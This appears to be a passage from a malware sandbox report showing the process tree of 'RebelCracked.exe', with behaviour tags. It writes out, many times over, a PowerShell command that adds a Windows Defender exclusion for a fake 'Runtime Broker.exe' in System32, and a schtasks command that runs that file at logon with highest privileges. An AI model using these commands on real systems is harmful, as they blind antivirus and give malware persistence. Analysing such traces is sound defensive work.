C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name115⤵
- Detects videocard installed
PID:6780
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"112⤵
- Drops file in System32 directory
PID:1576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'113⤵PID:2060
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1114⤵PID:2640
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST113⤵PID:6852
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"113⤵PID:6820
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"114⤵PID:5092
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"115⤵PID:4852
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"113⤵
- Drops file in System32 directory
PID:856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'114⤵PID:2648
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST114⤵
- Scheduled Task/Job: Scheduled Task
PID:6720 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1115⤵PID:2844
-
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"114⤵PID:6516
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"115⤵PID:6488
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"116⤵PID:3880
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1117⤵PID:656
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"114⤵
- Drops file in System32 directory
PID:3688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'115⤵PID:2752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1116⤵PID:3900
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST115⤵PID:2432
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"115⤵PID:6596
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"116⤵PID:1796
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"117⤵PID:2092
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"115⤵PID:2084
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'116⤵PID:6688
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST116⤵PID:4524
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"116⤵PID:4012
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"117⤵PID:6412
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"118⤵PID:5444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"116⤵PID:752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'117⤵
- Command and Scripting Interpreter: PowerShell
PID:2920
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST117⤵PID:5972
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"117⤵PID:7108
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"118⤵PID:2644
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"119⤵PID:6356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"117⤵PID:768
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'118⤵PID:1648
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST118⤵PID:3904
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"118⤵PID:1828
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"119⤵PID:2496
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"120⤵PID:5584
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1121⤵PID:5724
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"118⤵PID:4808
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'119⤵PID:5824
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST119⤵PID:5716
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"119⤵PID:5224
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"120⤵PID:852
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"121⤵PID:5684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"119⤵PID:6060
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'120⤵PID:6864
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST120⤵PID:2232
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"120⤵PID:5596
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"121⤵
- Blocklisted process makes network request
PID:5680 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"122⤵PID:3736
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-